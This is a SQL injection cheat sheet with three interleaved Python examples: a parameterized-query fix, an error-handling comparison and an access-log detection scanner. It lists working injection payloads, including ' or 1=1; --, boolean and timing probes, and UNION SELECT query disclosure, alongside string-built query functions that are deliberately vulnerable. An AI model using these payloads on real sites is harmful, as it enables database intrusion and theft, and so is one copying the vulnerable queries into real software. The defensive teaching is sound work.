SQL Injection Cheat Sheet
by binca via cheatography.com/44948/cs/13343/
Intro

Perhaps the most well known web app flaw.
Easier to address from an app security perspective, but remains a common flaw.
Apps employ relational databases for a multitude of reasons.
App interfaces add, update and render data.
The flaw originates from the app allowing user-supplied input to be dynamically used in a SQL query.
Numerous different Relational Database Management Systems are in use, including Oracle, MySQL and MSSQL.

Key SQL Verbs

SELECT    Retrieves data from tables, most commonly used
INSERT    Add data to a table
UPDATE    Modify existing data
DELETE    Delete data in a table
DROP      Delete a table
UNION     Combine data from multiple queries

SQL Query Modifiers

WHERE          Filter SQL query to apply only when a condition is met
AND/OR*        Combine WHERE conditions to narrow the SQL query
LIMIT #1,#2    Limits rows returned to #2 rows starting at row #1 (LIMIT 1,2 returns the same rows as LIMIT 2 OFFSET 1)
ORDER BY [#]   Sort by column number

Important SQL Data Types

bool      Boolean True/False
int       Integer
char      Fixed length string
varchar   Variable length string
binary    Fixed length binary string
Note: Names for data types may vary across RDBMSs.

SQL Special Characters

', "           String delimiters
;              Terminates a SQL statement
--, #, /*      Comment delimiters
%, *           Wildcard characters
||, +, " "     String concatenation characters
+, <, >, =     Mathematical operators
=              Test for equivalence
()             Calling functions, sub-queries, and INSERTs
%00            Null byte

SQL Injection Example Code

Server-side PHP code taking the value of URL query parameter name as input to a SQL SELECT:

$sql = "SELECT * FROM Users WHERE lname='{$_GET['name']}';";

The resulting query if the normal input is John:
URL: http://url/sqli.php?name=John
SQL Query: SELECT * FROM Users WHERE lname='John';
Normal result.

Injected Input Query
Input is John'
URL: http://url/sqli.php?name=John'
SQL Query: SELECT * FROM Users WHERE lname='John'';
Stray ' causes an error.

Injected Input Query 2
Input is John'; --
URL: http://url/sqli.php?name=John';--
SQL Query: SELECT * FROM Users WHERE lname='John';--';
Normal results (the trailing ' is commented out).

' or 1=1; --
A payload, or a variation upon it, found in most SQLi documentation.
The single quote* closes out any string.
The 1=1 changes the query logic because it is always true.
;-- ends the payload, completing the statement, and comments out the remaining code to prevent syntax errors.
Note: Some RDBMSs require a space after the "--" comment delimiter.
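The PHP line above pastes the request parameter straight into the query text. The script below is an added example (Python with the standard-library sqlite3 module, not code from the cheat sheet) that reproduces the three inputs the page walks through, plus the ' or 1=1; -- payload, against a constructed Users table, and runs the same inputs through a parameterized query, which is the standard fix. The table, its rows and the function names are assumptions made for the example.

```python
import sqlite3

# Constructed sample data standing in for the page's Users table.
SAMPLE_ROWS = [(1, "Elton", "John"), (2, "Arthur", "Dent"), (3, "Will", "Smith")]


def make_db():
    """Return an in-memory SQLite database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, fname TEXT, lname TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query_vulnerable(name):
    """Same construction as the page's PHP: the parameter is pasted into the SQL text."""
    return f"SELECT * FROM Users WHERE lname='{name}';"


def lookup_vulnerable(conn, name):
    """Run the string-built query; raises sqlite3.Error when the input breaks the syntax."""
    return conn.execute(build_query_vulnerable(name)).fetchall()


def lookup_parameterized(conn, name):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    return conn.execute("SELECT * FROM Users WHERE lname = ?;", (name,)).fetchall()


def compare(name):
    """Return (vulnerable_outcome, parameterized_outcome) for one input value.

    Each outcome is the row count, or the string "error" when the database
    rejects the query.  The parameterized lookup never errors on these inputs
    because the quote, the comment and the 1=1 are just characters in a value.
    """
    conn = make_db()
    try:
        vulnerable = len(lookup_vulnerable(conn, name))
    except sqlite3.Error:
        vulnerable = "error"
    parameterized = len(lookup_parameterized(conn, name))
    conn.close()
    return vulnerable, parameterized


if __name__ == "__main__":
    # The three inputs walked through on the page plus the classic payload.
    for value in ["John", "John'", "John';--", "' or 1=1; --"]:
        print(f"{value!r:18} -> {compare(value)}")
```

Running it shows the page's three outcomes on the vulnerable side (one row, a syntax error, one row with the stray quote commented out) and the whole table for ' or 1=1; --, while the parameterized side returns one row for John and zero rows for everything else, because a bound parameter is compared as data rather than compiled as SQL.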
By binca, cheatography.com/binca/. Not published yet. Last updated 9th November, 2017.
SQLi Balancing Act

Involves finding the correct prefixes, payloads and suffixes to evoke the desired behavior.
A significant aspect of discovering SQLi flaws is determining reusable pieces of our injection.
The most obvious balancing act is quotes.
The most common data type our input will land within is a string, so proper prefixes and suffixes to accommodate strings are necessary.

Example with comments: John';--
SELECT...WHERE lname='John';--';

Example without comments: John' OR '1'='1
SELECT...WHERE lname='John' OR '1'='1';

Balancing Column Numbers and Data Types

INSERT and UNION statements require us to know the number of columns required or used, otherwise a DB syntax error will occur.
INSERT and UNION statements also require the data type associated with the columns to be compatible.
ORDER BY [#] is another option, where the number is incrementally increased until an error is thrown.
Note: Numbers and strings are typically compatible.

Discovery of SQLi

Input locations that leverage/interact with the backend DB, such as login functionality.
HTTP request portions that are common input locations:
GET URL query parameters
POST payload
HTTP Cookie
HTTP User-Agent
HTTP Cookie and User-Agent injections are more likely to be blind.

Classes of SQLi

One vulnerability encountered in a variety of ways.
The simplest categorization is blind versus visible, but there is a spectrum.
In-Band/Inline SQLi is a flaw that allows us to see the result of our injection. These are easier to discover and exploit.
Blind SQLi is the same vulnerability but with no visible response.

Error Messages

Database Error Messages   Not only hint at the presence of SQLi but may guide us in crafting input for exploitation. If you see database error messages it is NOT blind SQLi.
Custom Error Messages     Can require a different approach because the error will not indicate if the input is being interpreted.

Equivalent String Injections

Prefix    Suffix    Note
John'     ;#        Commenting
John'     ;--       Commenting
Jo'/*     */'hn     Inline commenting
Jo'       'hn       Concatenation (with or without spaces)
Jo'|      |'hn      Concatenation

Comment delimiters (--, /**/, #) can allow injections to succeed that would otherwise fail.
The -- and # are useful SQL suffixes.
Injecting into the middle of a SQL statement/query will not allow us to alter the rest of the SQL statement, but it will show us if our input is being interpreted on the backend when we experience custom error messages (Blind SQLi).

Binary/Boolean Inference Testing

John' AND 1;#       True
John' AND 1=1;#     True
John' AND 0;#       False
John' AND 1=0;#     False

Compare the response when the condition evaluates to True (AND 1=1) with the response when it evaluates to False (AND 1=0).

Prefix:    Dent' AND
Evaluates: substr((select table_name from information_schema.tables limit 1),1,1) > "a"
Suffix:    ;#
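The Error Messages entry above separates raw database errors, which tell the client how its input was parsed, from custom errors, which do not. The script below is an added example (Python with sqlite3, not the cheat sheet's code) showing that difference from the application side: one handler returns the database's own error text, the other logs it server-side and returns one fixed message, so the quote-balancing and column-count inputs from this page all look the same to the client. The Users table, its rows, the SERVER_LOG list and the handler names are constructed for the example; the lookup is kept string-built on purpose so that those inputs actually reach the parser, and a parameterized query remains the real fix.

```python
import sqlite3

# Constructed sample data standing in for the page's Users table.
SAMPLE_ROWS = [(1, "Elton", "John"), (2, "Arthur", "Dent"), (3, "Will", "Smith")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, fname TEXT, lname TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup(conn, name):
    # Deliberately string-built, like the page's PHP, so that the probes
    # below reach the SQL parser.  Binding the value as a parameter is the
    # real fix; this example isolates the error-handling aspect.
    return conn.execute(f"SELECT * FROM Users WHERE lname='{name}';").fetchall()


def respond_leaky(conn, name):
    """Anti-pattern: the database's own error text is sent to the client."""
    try:
        return 200, {"rows": lookup(conn, name)}
    except sqlite3.Error as exc:
        return 500, {"error": str(exc)}


SERVER_LOG = []  # constructed stand-in for a server-side log sink


def respond_generic(conn, name):
    """Hardened handler: detail goes to the server log, the client gets one fixed message."""
    try:
        return 200, {"rows": lookup(conn, name)}
    except sqlite3.Error as exc:
        SERVER_LOG.append(f"db error for input {name!r}: {exc}")
        return 500, {"error": "request could not be processed"}


def distinct_error_bodies(handler, inputs):
    """Count how many different error responses a set of inputs produces.

    More than one distinct body means the response text is telling the
    client something about how its input was parsed (quote unbalanced,
    UNION column count wrong, and so on).
    """
    bodies = set()
    for name in inputs:
        conn = make_db()
        status, body = handler(conn, name)
        conn.close()
        if status == 500:
            bodies.add(body["error"])
    return len(bodies)


# Inputs from the page: an unbalanced quote, a quote balanced by a comment,
# and a UNION whose column count does not match the original SELECT.
PROBES = ["John'", "John';--", "John' UNION SELECT 1;--"]

if __name__ == "__main__":
    for name in PROBES:
        print(f"{name!r:28} leaky={respond_leaky(make_db(), name)[1]}")
    print("distinct leaky errors:  ", distinct_error_bodies(respond_leaky, PROBES))
    print("distinct generic errors:", distinct_error_bodies(respond_generic, PROBES))
    print("server log:", SERVER_LOG)
```

With the leaky handler the unbalanced quote and the mismatched UNION produce two different error bodies, which is exactly the feedback the page describes database errors giving; with the generic handler the client sees a single message for both, and the detail needed for debugging is still available in the server log.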
Blind Timing Inferences
When there is no discernible output or errors the use of timing-based
inference is a viable option.
Relies on responsiveness of app for the inference by artificially
inducing a delay when a condition evaluates.
Example:
Sleep(10) - MySQL
WAITFOR DELAY '0:0:10' - MSSQL
Out-of-Band SQLi
No error messages
No visible responses
No boolean/inference opportunities, with or without timing
Requires an alternative communication channel to discover or exploit these flaws
Out-of-Band channels may provide for faster exfiltration of some flaws susceptible to inference techniques. Typically leverages HTTP or DNS to tunnel communications back to an attacker-controlled server.
Query Disclosure
UNION SELECT is used to disclose the vulnerable query we are
injecting into.
Payload:
John' UNION SELECT '1','2','3', info FROM information_schema.processlist;#
Results:
SELECT * FROM Customers WHERE lname='John' UNION SELECT '1','2','3', info FROM information_schema.processlist;#'
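The discovery, inference, timing and query-disclosure sections above all describe input that leaves a visible trace in the request itself. The script below is an added example (Python, standard library only, not the cheat sheet's code) that turns the special-character table and those payload shapes into detection logic run over web-server access-log lines: it decodes each query parameter, tags the indicators it contains (string delimiter, comment delimiter, statement terminator, always-true comparison, UNION SELECT, delay function) and flags a value when two or more indicators coincide, or when a lone quote is paired with a 500 response, the page's "stray ' causes error" signature. The log lines, hostnames and thresholds are constructed for the example; the delay-function list is limited to the Sleep and WAITFOR DELAY forms named on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Common Log Format) used as sample input.
# They replay the page's inputs: a normal name, a stray quote that caused
# a 500, the ' or 1=1 payload, a boolean probe, the UNION SELECT payload,
# a sleep()-based timing probe, and a legitimate name containing a quote.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2017:10:00:01 +0000] "GET /sqli.php?name=John HTTP/1.1" 200 512
10.0.0.5 - - [09/Nov/2017:10:00:02 +0000] "GET /sqli.php?name=John%27 HTTP/1.1" 500 98
10.0.0.5 - - [09/Nov/2017:10:00:03 +0000] "GET /sqli.php?name=%27+or+1%3D1%3B+-- HTTP/1.1" 200 8123
10.0.0.5 - - [09/Nov/2017:10:00:04 +0000] "GET /sqli.php?name=John%27+AND+1%3D0%3B%23 HTTP/1.1" 200 512
10.0.0.5 - - [09/Nov/2017:10:00:05 +0000] "GET /sqli.php?name=John%27+UNION+SELECT+%271%27%2C%272%27%2C%273%27%2Cinfo+FROM+information_schema.processlist%3B%23 HTTP/1.1" 200 2048
10.0.0.5 - - [09/Nov/2017:10:00:06 +0000] "GET /sqli.php?name=John%27+AND+sleep(10)%3B%23 HTTP/1.1" 200 512
10.0.0.5 - - [09/Nov/2017:10:00:07 +0000] "GET /sqli.php?name=O%27Brien HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators drawn from the page's special-character table and payload shapes.
INDICATORS = [
    ("string delimiter", re.compile(r"['\"]")),
    ("comment delimiter", re.compile(r"--|#|/\*")),
    ("statement terminator", re.compile(r";")),
    ("always-true comparison", re.compile(r"'?(\d+)'?\s*=\s*'?\1'?")),
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time delay", re.compile(r"\b(sleep|waitfor\s+delay)\b", re.I)),
]


def analyze_value(value):
    """Return the names of every indicator present in one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def analyze_line(line):
    """Parse one log line and return a list of findings (possibly empty)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    status = int(m.group("status"))
    query = urlsplit(m.group("target")).query
    findings = []
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs already URL-decodes, turning %27 into '
            hits = analyze_value(value)
            # A single quote on its own is common in real names (O'Brien), so
            # it is only flagged alone when the server answered with a 500.
            if len(hits) >= 2 or (hits and status == 500):
                findings.append({"param": param, "value": value,
                                 "status": status, "indicators": hits})
    return findings


def scan(log_text):
    """Return [(line_number, finding), ...] for every flagged parameter value."""
    results = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        for finding in analyze_line(line):
            results.append((n, finding))
    return results


if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(f"line {n}: {f['param']}={f['value']!r} status={f['status']} -> {f['indicators']}")
```

On the sample, lines 2 to 6 are flagged and lines 1 and 7 are not: the O'Brien request carries the same quote as the line-2 request but got a 200, so it stays below the threshold. In a real deployment this is a triage filter for log review rather than a blocking rule, and a URL-encoded or fragment-style # in a live request will only reach the value if the client encoded it, as the sample does.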